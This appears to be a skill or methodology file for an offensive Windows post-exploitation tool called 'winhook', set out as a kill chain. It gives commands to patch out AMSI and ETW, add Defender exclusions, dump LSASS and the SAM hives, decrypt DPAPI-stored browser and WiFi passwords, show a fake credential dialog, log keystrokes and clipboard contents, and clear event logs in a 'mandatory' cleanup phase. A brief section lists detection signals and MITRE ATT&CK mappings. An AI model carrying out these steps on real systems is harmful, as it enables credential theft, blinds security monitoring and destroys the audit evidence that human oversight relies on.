| name | windows-postexploit |
| description | Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations |
| category | post-exploitation |
| tags | ["windows","post-exploitation","credential-access","defense-evasion","lsass","dpapi","etw","amsi","sam","keylogging"] |
| tech_stack | ["windows","powershell","python","ctypes","win32api"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-312"] |
| chains_with | ["T1003","T1003.001","T1003.002","T1056.001","T1059.001","T1562.001","T1562.006","T1070.001","T1555","T1555.003"] |
| prerequisites | ["T1068","T1548.002"] |
| version | 1.0 |
Windows Post-Exploitation Methodology
Windows post-exploitation uses userland APIs (no kernel driver signing needed) for credential harvesting, monitoring, and stealth. After gaining Administrator access on a Windows target, these tools provide comprehensive credential extraction and operational security capabilities.
Prerequisites
Before deploying winhook tools, verify:
- Administrator access — most operations require elevated privileges
- OS version — Windows 10/11 or Server 2016+ for ETW features
- PowerShell — available natively on all modern Windows
- Python3 — required for ctypes-based tools (ETW, keylogging, DPAPI, clipboard)
- AV/EDR status — run
amsi_bypass and etw_blind first if Defender/EDR is active
# Quick prerequisite check
whoami /priv # verify SeDebugPrivilege
Get-MpComputerStatus | Select RealTimeProtectionEnabled # Defender status
Get-Process lsass # verify LSASS accessible
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL # PPL status
Kill Chain Phases
Phase 1 — AV/EDR Evasion (First priority)
Neutralize monitoring before performing credential operations.
| Action | Command | Purpose |
|---|
| Bypass AMSI | winhook amsi_bypass | Patch AmsiScanBuffer to allow undetected PowerShell execution |
| Blind ETW | winhook etw_blind | Patch EtwEventWrite to prevent EDR from receiving telemetry |
| Exclude paths | winhook defender_exclude --path C:\Tools | Add Defender exclusion for tool staging directory |
Phase 2 — Credential Harvesting
Extract credentials from multiple sources.
| Action | Command | Purpose |
|---|
| LSASS dump | winhook lsass_dump | Dump LSASS memory for NTLM hashes, Kerberos tickets, plaintext passwords |
| SAM extraction | winhook sam_dump | Extract registry hives for offline cracking with secretsdump/hashcat |
| DPAPI secrets | winhook dpapi_extract | Decrypt browser passwords, WiFi keys, Windows Vault credentials |
| Credential phishing | winhook credential_prompt | Spawn fake Windows credential dialog to capture user password |
| Keystroke capture | winhook keylog_win --duration 120 | Log keystrokes with active window context |
| Clipboard monitoring | winhook clipboard_sniff --duration 60 | Capture copied passwords, tokens, and sensitive data |
LSASS dumping uses either comsvcs.dll MiniDump (default, uses a signed Windows DLL) or direct MiniDumpWriteDump from dbghelp.dll. The comsvcs method is preferred as it uses a Microsoft-signed binary.
DPAPI decryption calls CryptUnprotectData from crypt32.dll to decrypt Chrome/Edge Login Data, WiFi passwords, and Windows Credential Vault entries. No additional tools needed — uses the current user's DPAPI master key.
SAM extraction uses reg save to dump SAM, SYSTEM, and SECURITY hives. These can be processed offline with impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL.
Phase 3 — Monitoring
Understand the target environment and detect defensive measures.
| Action | Command | Purpose |
|---|
| Process monitoring | winhook etw_process --duration 60 | Track process creation via ETW — detect security tools, scheduled tasks |
| Network monitoring | winhook etw_network --duration 60 | Track connections via ETW — identify C2 channels, internal services |
Phase 4 — Cleanup (MANDATORY)
Always run cleanup before exiting a target.
winhook cleanup_win
The cleanup tool:
- Clears Security, System, Application, and PowerShell event logs
- Removes temporary files matching CyberStrike patterns
- Removes any Defender exclusions that were added
- Reports on AMSI/ETW patches (require process restart to fully restore)
Detection Considerations
Windows post-exploitation tools are detectable by:
- Sysmon — Event IDs 1 (process create), 10 (process access for LSASS), 13 (registry)
- Windows Event Log — Event ID 4688 (process creation), 4624/4625 (logon), 1102 (log cleared)
- EDR — LSASS access monitoring, credential prompt anomaly detection
- PPL (Protected Process Light) — LSASS PPL blocks direct memory dumps (check RunAsPPL registry key)
- Credential Guard — Isolates LSASS in virtualization-based security (blocks comsvcs/minidump)
Program Reference
| Program | Technique | MITRE ATT&CK |
|---|
| lsass_dump | LSASS memory dump via MiniDumpWriteDump | T1003.001 — LSASS Memory |
| sam_dump | Registry hive extraction (SAM/SYSTEM/SECURITY) | T1003.002 — Security Account Manager |
| dpapi_extract | DPAPI secret decryption via CryptUnprotectData | T1555.003 — Credentials from Web Browsers |
| credential_prompt | Fake credential dialog via CredUI | T1056.002 — GUI Input Capture |
| keylog_win | Keystroke capture via SetWindowsHookEx | T1056.001 — Keylogging |
| etw_process | Process monitoring via ETW provider | T1057 — Process Discovery |
| etw_network | Network monitoring via ETW provider | T1049 — System Network Connections Discovery |
| clipboard_sniff | Clipboard monitoring via Win32 API | T1115 — Clipboard Data |
| amsi_bypass | AMSI patching in memory | T1562.001 — Disable or Modify Tools |
| etw_blind | ETW patching to blind EDR | T1562.006 — Indicator Blocking |
| defender_exclude | Windows Defender exclusion management | T1562.001 — Disable or Modify Tools |
| cleanup_win | Event log clearing and artifact removal | T1070.001 — Clear Windows Event Logs |
